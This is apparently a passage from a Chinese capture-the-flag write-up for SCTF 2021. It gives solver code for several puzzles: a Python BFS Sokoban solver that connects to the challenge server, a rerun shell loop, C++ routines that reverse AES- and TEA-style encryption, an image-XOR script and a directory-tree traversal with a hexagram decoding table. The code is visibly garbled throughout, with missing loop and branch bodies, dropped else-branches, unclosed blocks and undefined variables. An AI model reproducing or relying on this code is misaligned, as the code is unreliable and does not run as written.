                        flag = True
                        choose = j
                if flag == True:
                queue.append(addr(next_x, next_y))
                from_map[20 * next_y + next_x].x = cur_x
                from_map[20 * next_y + next_x]. y= cur_y
                check_map[next_y * 20 + next_x] = 1
    if flag == False:
        print("boxs (%2d, %2d) no solver" % (box_x, box_y))
    order = [addr(storage[choose].x, storage[choose].y)]
    cur_x = from_map[20 * storage[choose].y + storage[choose].x].x
    cur_y = from_map[20 * storage[choose].y + storage[choose].x].y
    while cur_x != 0 and cur_y != 0:
        order.append(addr(cur_x, cur_y))
        temp_cur_x = from_map[20 * cur_y + cur_x].x
        temp_cur_y = from_map[20 * cur_y + cur_x].y
        cur_x = temp_cur_x
        cur_y = temp_cur_y
    order = order[::-1]
    ## print debug information
    # for i in range(0, len(order)):
    #     print("-> (%2d,%2d) " % (order[i].x, order[i].y), end = "")
    # print("")
    used_storaged[choose] = 1
    return order

def BFS_cur2des(x, y, des_x, des_y, map):
    if judge_connect(des_x,des_y, map) == False:
        print("no connected")
    cur_x = x
    cur_y = y
    queue = [addr(cur_x, cur_y)]
    check_map = [0] * 400
    from_map = [addr(0, 0) for i in range(400)]
    flag = False #标识到达终点
    while len(queue) > 0:
        if flag:
        cur_x = queue[0].x
        cur_y = queue[0].y
        check_map[cur_y * 20 + cur_x] = 1
        x_offset = [0, 0, -1, 1]
        y_offset = [-1, 1, 0, 0]
        for i in range(0, 4):
            next_x = cur_x + x_offset[i]
            next_y = cur_y + y_offset[i]
            if next_x < 0 or next_x > 19 or next_y < 0 or next_y > 19 :
            if judge_2(next_x, next_y, map) and check_map[next_y * 20 + next_x] == 0:
                if next_x == des_x and next_y == des_y:
                    from_map[20 * next_y + next_x].x = cur_x
                    from_map[20 * next_y + next_x].y= cur_y
                    flag = True
                queue.append(addr(next_x, next_y))
                from_map[20 * next_y + next_x].x = cur_x
                from_map[20 * next_y + next_x]. y= cur_y
                check_map[next_y * 20 + next_x] = 1
    order = [addr(des_x, des_y)]
    cur_x = from_map[20 * des_y + des_x].x
    cur_y = from_map[20 * des_y + des_x].y
    while cur_x != 0 and cur_y != 0:
        order.append(addr(cur_x, cur_y))
        temp_cur_x = from_map[20 * cur_y + cur_x].x
        temp_cur_y = from_map[20 * cur_y + cur_x].y
        cur_x = temp_cur_x
        cur_y = temp_cur_y
    order = order[::-1]
    # for i in range(0, len(order)):
    #     print("-> (%2d,%2d) " % (order[i].x, order[i].y), end = "")
    solve = ""
    for i in range(0, len(order) - 1):
        if (order[i].x - order[i + 1].x) == 0:
            if (order[i].y - order[i + 1].y) == 1:
                solve += "w"
                solve += "s"
            if (order[i].x- order[i + 1].x) == 1:
                solve += "a"
                solve += "d"
    return solve

def do_it(map):
    cur_x = 10
    cur_y = 10
    for i in range(0, 20):
        for j in range(0 ,20):
            if map[20 * i + j] == '.':
                storage.append(addr(j ,i))
            if map[20 * i + j] == '$':
                boxs.append(addr(j, i))
    sol = ""
    # return
    for k in range(0, 4):
        solve = ""
        t = 0
        while t < 4:
            if used_storaged[t] == 0:
                order = BFS_box2storage(boxs[k].x, boxs[k].y, storage[t].x, storage[t].y, map)
            t += 1
        for i in range(0, len(order) - 1):
            cur_des_x = order[i].x - order[i + 1].x + order[i].x
            cur_des_y = order[i].y - order[i + 1].y + order[i].y
            if cur_des_x == cur_x and cur_des_y == cur_y:
                if (order[i].x - order[i + 1].x) == 0:
                    if (order[i].y - order[i + 1].y) == 1:
                        solve += "w"
                        temp_des = "w"
                        solve += "s"
                        temp_des = "s"
                    if (order[i].x- order[i + 1].x) == 1:
                        solve += "a"
                        temp_des = "a"
                        solve += "d"
                        temp_des = "d"
                # cur_x = order[i].x
                # cur_y = order[i].y
                cur_x, cur_y = map_update(cur_x, cur_y, temp_des, map)
                # if i != 0:
                #     map[boxs[k].y * 20 + boxs[k].x] = '_'
                #     map[order[i].y * 20 + order[i].x] = '$'
                #     boxs[k].y = order[i].y
                #     boxs[k].x = order[i].x
                temp = BFS_cur2des(cur_x, cur_y, cur_des_x, cur_des_y, map)
                solve += temp
                for j in range(0, len(temp)):
                    cur_x, cur_y = map_update(cur_x, cur_y, temp[j], map)
                if (order[i].x - order[i + 1].x) == 0:
                    if (order[i].y - order[i + 1].y) == 1:
                        solve += "w"
                        temp_des = "w"
                        solve += "s"
                        temp_des = "s"
                    if (order[i].x- order[i + 1].x) == 1:
                        solve += "a"
                        temp_des = "a"
                        solve += "d"
                        temp_des = "d"
                # cur_x = order[i].x
                # cur_y = order[i].y
                cur_x, cur_y = map_update(cur_x, cur_y, temp_des, map)
        # map[boxs[k].y * 20 + boxs[k].x] = '_'
        # map[storage[cur_choose].y * 20 + storage[cur_choose].x] = '*'
        sol += solve
        # print(solve)
    # print(sol)
    return sol

def my_init():
    global boxs
    global storage
    global used_storaged
    boxs = copy.copy([])
    storage = copy.copy([])
    used_storaged = copy.copy([0] * 4)

if __name__ == "__main__":
    # p = process('./sycgame')
    context.log_level = "debug"
    p = remote("", 1448)
    for i in range(0, 5):
        content = p.recvuntil("\n")[:-2]
        # print("*********************************")
        # print(content)
        content = content.decode()
        # print(content)
        map = generate_map(content)
        sol = do_it(map)
        # p.interactive()
        p.recvuntil("Tell me sol:")
        # print(p.recv())
    print('&' * 200)


loop.sh 脚本,通过这个脚本循环执行 exp 总能找到几次完全通过游戏的关卡,打开 out.txt, 搜索&搜到的第一个位置附近就有 flag

while(( $int<=1000 ))
    python3 exp.py >> out.txt
    let "int++"
    sleep 0.5
    echo "" >> out.txt
    echo "" >> out.txt

exception cpp

  int cArray[4][4];
    int wArray[4][4];
    uint32_t key[] = { 0x21667463,0x735F6F74,0x5F656D6F,0x636C6557 };
    uint32_t v[] = { 0,0,0,0 };
    uint8_t roundkeys[176] = { 0,0, };
    uint8_t key1[] = "Welcome_to_sctf!";
   // uint8_t plaintext[16] = { 0x53,0x1b,0xda,0x34,0x3b,0xea,0xdd,0x22,0xf3,0xc7,0xe5,0x17,0x96,0xd4,0x43,0xd3 };
    uint8_t plaintext[16] = {

         0xF2, 0x93, 0x55, 0xDA,
        0x48, 0xFC, 0xA2, 0x3C, 0x89, 0x63, 0x2E, 0x7F, 0x8D, 0xA4,
        0x6D, 0x4E

    enc_next_ready(key1, roundkeys);

    addRoundKey(plaintext, roundkeys, 10);
    convertToIntArray(plaintext, cArray);
    for (int i = 0; i < 4; ++i) {
        for (int j = 0; j < 4; ++j) {
            plaintext[4 * i + j] = cArray[j][i];
    for (int round = 9; round >= 1; --round) {
        addRoundKey(plaintext, roundkeys, round);
        convertToIntArray(plaintext, cArray);
        for (int i = 0; i < 4; ++i) {
            for (int j = 0; j < 4; ++j) {
                plaintext[4 * i + j] = cArray[j][i];
        convertToIntArray(plaintext, cArray);
        for (int i = 0; i < 4; ++i) {
            for (int j = 0; j < 4; ++j) {
                plaintext[4 * i + j] = cArray[j][i];


    for (int i = 0; i < 4; ++i) {
        for (int j = 0; j < 4; ++j) {
            plaintext[4 * i + j] = cArray[j][i];

      for (int i = 0; i < 16; ++i)
           plaintext[i] = plaintext[i] ^ roundkeys[i] ^ 0x66;
      for (int i = 0; i < 16; ++i)
          printf("0x%x,", plaintext[i]);
      for (int i = 0; i < 4; ++i) {
          for (int j = 0; j < 4; ++j) {
              v[i] = (uint32_t )(plaintext[4 * i + j] << (8 * j)) | v[i];
    uint32_t  key2[] = { 0x21667463,0x735F6F74,0x5F656D6F,0x636C6557 };
    decrypt1(v, key2);
     for (int i = 0; i < 4; ++i) {
         for (int j = 0; j <4; ++j) {
             plaintext[4 * i + j] = (v[i] >> (8 * j) & 0xff);
     for (int i = 0; i < 16; ++i)


  for(int k = 0xf ; k >= 0 ; k--){

       for (int i = 0; i < 0x1000; i += 8) {
        uint32_t v[2];
        uint32_t  key[4] = { 0x11222233 ,0xAABBCCDD, 0x1a2b3c4d,0xcc1122aa };
        v[0] = *(uint32_t*)(d_e8 + i);
        v[1] = *(uint32_t*)(d_e8 + 4 + i);
        decrypt(v, key);
        //  printf("v0 == %lx v1== %lx",v[0],v[1]);
        *(uint32_t*)(d_e8 + i) = v[0];
        *(uint32_t*)(d_e8 + 4 + i) = v[1];
    for (int i = 0; i < 0x1000; i += 8) {
        uint32_t v[2];
        uint32_t  key[4] = { 0x11222233 ,0xAABBCCDD, 0x1a2b3c4d,0xcc1122aa };
        v[0] = *(uint32_t*)(d_e0 + i);
        v[1] = *(uint32_t*)(d_e0 + 4 + i);
        decrypt1(v, key);
        //  printf("v0 == %lx v1== %lx",v[0],v[1]);
        *(uint32_t*)(d_e0 + i) = v[0];
        *(uint32_t*)(d_e0 + 4 + i) = v[1];


    unsigned char input[0x41] ={0};
    for(int i = 0 ; i < 0x20; ++i){
       for(uint8_t t1 = 0x30 ; t1 < 0x7e ; ++t1){
           d_2ec8 = t1 + i;
           for(int  j = 0 ; j < 0x80 ; ++j){
             uint8_t tmp = shencheng();
        if((0[0x80 * i + j] == tmp)&&(j==0x7d)){
            input[i] = t1;




    for(int i = 0 ; i < 0x20; ++i){
       for(uint8_t t1 = 0x30; t1 < 0x7e ; ++t1){
           d_2ec8 = t1 + i;
           for(int j = 0 ; j < 0x80 ; ++j){
            uint8_t tmp = fakerandom();
        if((d_e0[0x80 * i + j] == tmp)&&(j==0x7d)){
            input[0x20 +i] = t1;









from PIL import Image,ImageOps

f2 = Image.open('21.png')
f1 = Image.open('26.png')
fufu = Image.open('fumo.png')
flag = Image.new('RGB', (133, 100))
for i in range(50):
    for j in range(133):
        c1 = f1.getpixel((j, i))
        c2 = fufu.getpixel((j, i))
        c = (c1[0] ^ c2[0], c1[1] ^ c2[1], c1[2] ^ c2[2])
        flag.putpixel((j, i), c)
for i in range(50):
    for j in range(133):
        c1 = f2.getpixel((j, i))
        c2 = fufu.getpixel((j, i + 50))
        c = (c1[0] ^ c2[0], c1[1] ^ c2[1], c1[2] ^ c2[2])
        flag.putpixel((j, i + 50), c)
flag = ImageOps.invert(flag)
flag = flag.transpose(Image.FLIP_LEFT_RIGHT)


解压得到一个文件夹,每个文件夹下都有 left 子文件夹和 right 文件夹,还有一个 data 数据文件,当作二叉树处理,先序遍历所有结点得到的字符串是一个 base64, 解 base64 后面还有一个六十四卦解密得到 flag

import os

s = ""

def preorder(url):
    global s
    # print(open(url + "/data", "r").read(), end = "")
    s += open(url + "/data", "r").read()
    if os.path.exists(url + "/letf"):
        preorder(url + "/letf")
    if os.path.exists(url + "/Right"):
        preorder(url + "/Right")

if __name__ == "__main__":
    dir = "D:/CTF/2021/SCTF/78afbe21e9334e83a265e984a1aa9ddd"
    # 师兑复损巽震晋姤大过讼噬嗑震恒节豫
    dic={'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇':  '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111', '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家  人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101',  '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}
    for i in range(len(s)):
        if k ==1:
    for i in range(0,len(ss),8):